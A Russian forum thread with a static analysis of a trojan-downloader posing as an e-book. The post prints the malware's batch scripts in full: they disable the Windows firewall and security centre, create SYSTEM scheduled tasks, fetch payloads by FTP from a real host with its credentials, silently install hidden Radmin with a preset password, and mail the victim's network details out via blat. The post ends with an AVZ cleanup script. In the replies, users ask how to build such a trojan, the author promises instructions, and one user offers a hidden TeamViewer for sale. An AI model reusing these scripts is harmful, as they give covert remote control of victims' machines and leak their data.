Скрытый радмин + батник-лоадер. Анализ.

[onthar]

Скрытый радмин + батник-лоадер. Анализ.

Сегодня на форуме в личку прошло сообщение с просьбой проверить файл. Я согласился, любопытно же.
kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)
Хэш суммы я буду указывать только для вредоносных файлов.
В общем по описанию – это какая-то книга, почему в exe – непонятно, глядим далее.
Воспользуемся PEiD:

[Ссылки могут видеть только зарегистрированные пользователи. ]
UPX 0.89.6 – 1.02 / 1.05 – 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]

Попробуем распаковать винраром, получим два файла:

filip_olegovich.exe
и setup.exe (md5:C888FCE716D600EE53D467F7DF2B2475)

[Ссылки могут видеть только зарегистрированные пользователи. ]

Оба упакованы в upx, после распаковки получим следующую картину:

[Ссылки могут видеть только зарегистрированные пользователи. ]

filip_olegovich.exe – собранный в exe pdf-файл, он нас более не интересует.
setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) – компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.

Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованного setup.exe:

[Ссылки могут видеть только зарегистрированные пользователи. ]

Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:

Код:

 
sc config schedule start= auto
sc start schedule
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc stop wscsvc
sc stop SharedAccess
schtasks /create /tn «f» /sc minute /mo 1 /ru «NT AUTHORITY\SYSTEM» /tr %systemroot%/ff.bat
attrib +h %systemroot%/tasks/*.* netsh advfirewall set currentprofile state off
C:/isendsms_setup.exe

Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл.
Разработчик или параноик или диллетант, скорее – второе.

Проще говоря, этот файл setup.exe – экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровезированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin

Код:

 
u11631
javasc
get f.bat
del check.txt
bye

А такой код в %systemroot%/ff.bat

Код:

 
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc stop wscsvc sc stop SharedAccess
ftp -s:C:\WINDOWS/system.bin ftp.on.ufanet.ru f.bat

%systemroot% – папка windows, в моем случае C:\windows

О чем это может нам сказать?
Прежде всего, файл system.bin – конфиг для фтп-клиента, который зайдет на сервер и скачает определенный файл. (Строки по очереди: логин от сервера, пароль, скачивание файла с сервера, удаление файла на сервере, завершение ftp-сессии)

Что делает файл ff.bat? Во первых останавливает и убирает из автозагрузки две службы: wscsvc - центр обеспечения безопасности и оповещения системы безопасности
SharedAccess - брэндмауэр windows Это не позволяет встроенному фаерволлу заблокировать дальнейшую сетевую активность, а так же блокирует оповещения о брешах в безопасности системы.

Далее поднимает подключение к фтп серверу ftp.on.ufanet.ru с настойками из файла system.bin. После завершения сессии фтп – выполнит файл f.ftp, который скачает с указанного сервера.


Наши файлы setup.exe, кстати, уже проанализировались на virustotal:

• [Ссылки могут видеть только зарегистрированные пользователи. ]
• [Ссылки могут видеть только зарегистрированные пользователи. ]

Дальше нам нужно получить файлы, которые должны были скачаться с фтп, для этого возьмем логин и пароль и подключимся самостоятельно:
f.bat
system.exe (md5:1ADEF54E08294BC7548C91C8F6CF2032) – RAR SFX архив с таким вот комментарием:
path=%SYSTEMROOT%/help/win32silent=1overwrite=1setup=install.batЭтот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32

[Ссылки могут видеть только зарегистрированные пользователи. ]

После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии:

[Ссылки могут видеть только зарегистрированные пользователи. ]

raddrv.dll и AdmDll.dll – драйвера Radmin 2
svchost.exe – исполняемый файл Radmin 2
Blat.* – файлы, пренадлежащие консольному почтовому клеинту blat
А вот эти файлы рассмотрим поподробней: install.bat

Код:

@echo off
sc config wscsvc start= disabled
sc stop wscsvc
sc config SharedAccess start= disabled
sc stop SharedAccess
sc config schedule start= auto
sc start schedule
svchost.exe /install /silence
svchost.exe /pass:12345678125 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d «Service Host Controller» /f
svchost.exe /stop
svchost.exe /start
blat.exe -install -server smtp.yandex.ru -port 587 -f [Ссылки могут видеть только зарегистрированные пользователи. ] -u ufanetcom2 -pw javascriptsc
schtasks /create /tn «security» /sc minute /mo 15 /ru «NT AUTHORITY\SYSTEM» /tr %SYSTEMROOT%/help/win32/microsoft.bat
attrib +h %systemroot%/tasks/*.*
exit

Разберем комманды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее – самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина – Service Host Controller
Ну и окончание – запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat

Код:

sc config SharedAccess start= disabled
sc stop SharedAccess
ipconfig /all>%SYSTEMROOT%\Help\win32/ip.txt
%SYSTEMROOT%/help/win32/blat.exe
%systemroot%/help/win32/ip.txt -to [Ссылки могут видеть только зарегистрированные пользователи. ]
exit

Второй батник уже в который раз отключает системный фаерволл, а так же выполняет команду ipconfig /all с сохранением вывода в текстовый файл, который в дальнейшем отправится с помощью blat по адресу [Ссылки могут видеть только зарегистрированные пользователи. ], короче говоря – отправит ip-адрес для подключения злоумышленника к инфицированной машине.

На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.

Код:

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
StopService('r_server');
DeleteService('r_server', true );
TerminateProcessByName('c:\windows\help\win32\svchost.exe');
DeleteFile('C:\WINDOWS\ff.bat');
DeleteFile('C:\WINDOWS\SYSTEM.DLL');
DeleteFileMask('C:\WINDOWS\help\win32', '*.*', true);
BC_ImportAll;
ExecuteSysClean;
ExecuteWizard('TSW',2,3,true);
BC_Activate;RebootWindows(true);
end.

[anthrax]

onthar Благодарю, был знаком так сказать с данной темой, подробностей не расскажу, но скажу только то что почистили хорошо, так что будьте осторожнее и проверяйте своих друзей, особенно если они решили передать вам что-то в формате .exe, кстати onthar не подскажешь ли, как такую штуку самому собрать?

[ZERO COOL]

Т.е. Можно это дело собрать на свою пользу? спасибо

[Хулиган]

про настройку и установку сборки скрытого радмина,писал Индиго,на xaker.name

[ZERO COOL]

Нет)))) я помню эту тему, точь в точь на грабе, и не спорь)))))) даже афтор тот же

[anthrax]

ZERO COOL не советую, бог шельму метит, это слишком серьёзно, так как этот софт уже не для школоты, а зачем своих трогать?!

[Monah]

Цитата: Сообщение от ZERO COOL

Т.е. Можно это дело собрать на свою пользу? спасибо

Можно только осторожно. Есть и другие проги собраные под админ управления.
Радмин щас такой версии уже палится сильно.
Да про сборку писал Iindigo на ХН.
Это несколько другая версия описана в этой теме.

[onthar]

Цитата: Сообщение от ZERO COOL

Нет)))) я помню эту тему, точь в точь на грабе, и не спорь)))))) даже афтор тот же

Действительно, Индиго и я в том числе, писали про сборки скрытого радмина как второй версии, так и третьей. Сейчас полно разных модификаций просто.

Как создать трояна из этого поста я напишу позже, хотя и так все вроде бы очевидно.

[vicind]

Могу предложить скрытый TeamViewer, ему пофиг роутеры и ip - он использует ID Стучите в Аську 365911818

[onthar]

vicind, такое есть в паблике, причем несколько вариантов, так что не надо тут барыжить ;)

[vicind]

К сожалению TeamViewer уже палится антивирями! Там палится tv.dll

[anthrax]

Цитата: Сообщение от vicind

К сожалению TeamViewer уже палится антивирями! Там палится tv.dll

Впервые об этом слышу, на сколько я знаю TeamViewer это софт от Microsoft

[Harry123]

Цитата: Сообщение от anthrax

Впервые об этом слышу, на сколько я знаю TeamViewer это софт от Microsoft

он говорит о модифицированном, скрытом